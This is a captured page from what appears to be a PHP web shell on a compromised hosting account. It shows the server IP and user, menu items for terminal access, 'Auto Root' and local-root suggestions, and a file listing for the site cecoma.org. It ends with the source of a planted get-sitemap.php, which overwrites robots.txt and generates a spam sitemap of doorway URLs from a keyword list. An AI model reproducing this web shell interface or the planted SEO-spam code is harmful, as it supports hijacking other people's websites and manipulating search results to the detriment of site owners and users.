Linux premium313.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
Server IP : 63.250.38.106 & Your IP : 216.73.216.212
Domains :
Cant Read [ /etc/named.conf ]
User : punyaqqvio
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
punyaqqvio /
cecoma.org /
Delete
Unzip
Name
Size
Permission
Date
Action
.well-known
[ DIR ]
drwxr-xr-x
2025-06-24 11:28
assets
[ DIR ]
drwxr-xr-x
2026-04-10 05:33
cgi-bin
[ DIR ]
drwxr-xr-x
2026-04-10 05:33
vendor
[ DIR ]
drwxr-xr-x
2026-04-10 05:33
.htaccess
1.99
KB
-r--r--r--
2026-04-11 01:31
admin.php
5.23
KB
-rw-r--r--
2026-04-11 03:25
get-sitemap.php
2.08
KB
-rw-r--r--
2025-06-24 12:12
google8b586434192c68e5.html
53
B
-rw-r--r--
2025-06-24 12:26
landing.php
85.77
KB
-rw-r--r--
2025-06-25 14:15
landing.txt
85.77
KB
-rw-r--r--
2025-06-24 12:24
list.txt
371.61
KB
-rw-r--r--
2025-06-24 22:52
robots.txt
63
B
-rw-r--r--
2025-06-24 12:14
sitemap.xml
2.74
MB
-rw-r--r--
2025-06-24 12:14
tunel jagakarsa.zip
3.6
MB
-rw-r--r--
2025-06-24 12:04
txets.php
5.61
KB
-r--r--r--
2026-04-11 01:31
Save
Rename
<?php function getFileRowCount($filename) { $file = fopen($filename, "r"); $rowCount = 0; while (!feof($file)) { fgets($file); $rowCount++; } fclose($file); return $rowCount; } $protocol = isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? 'https' : 'http'; $fullUrl = $protocol . "://" . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']; if (isset($fullUrl)) { $parsedUrl = parse_url($fullUrl); $scheme = isset($parsedUrl['scheme']) ? $parsedUrl['scheme'] : ''; $host = isset($parsedUrl['host']) ? $parsedUrl['host'] : ''; $path = isset($parsedUrl['path']) ? $parsedUrl['path'] : ''; $baseUrl = $scheme . "://" . $host . $path; $urlAsli = str_replace("get-sitemap.php", "", $baseUrl); $robotsTxt = "User-agent: *" . PHP_EOL; $robotsTxt .= "Allow: /" . PHP_EOL; $robotsTxt .= "Sitemap: " . $urlAsli . "sitemap.xml" . PHP_EOL; file_put_contents('robots.txt', $robotsTxt); $judulFile = "list.txt"; $jumlahBaris = getFileRowCount($judulFile); $sitemapFile = fopen("sitemap.xml", "w"); fwrite($sitemapFile, '<?xml version="1.0" encoding="UTF-8"?>' . PHP_EOL); fwrite($sitemapFile, '<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">' . PHP_EOL); $fileLines = file($judulFile, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES); foreach ($fileLines as $index => $judul) { $sitemapLink = $urlAsli . '?maapya=' . urlencode($judul); fwrite($sitemapFile, ' <url>' . PHP_EOL); fwrite($sitemapFile, ' <loc>' . $sitemapLink . '</loc>' . PHP_EOL); date_default_timezone_set('Asia/Jakarta'); $currentTime = date('Y-m-d\TH:i:sP'); fwrite($sitemapFile, ' <lastmod>' . $currentTime . '</lastmod>' . PHP_EOL); fwrite($sitemapFile, ' <changefreq>daily</changefreq>' . PHP_EOL); fwrite($sitemapFile, ' </url>' . PHP_EOL); } fwrite($sitemapFile, '</urlset>' . PHP_EOL); fclose($sitemapFile); echo "SITEMAP DONE CREATE!"; } else { echo "URL saat ini tidak didefinisikan."; } ?>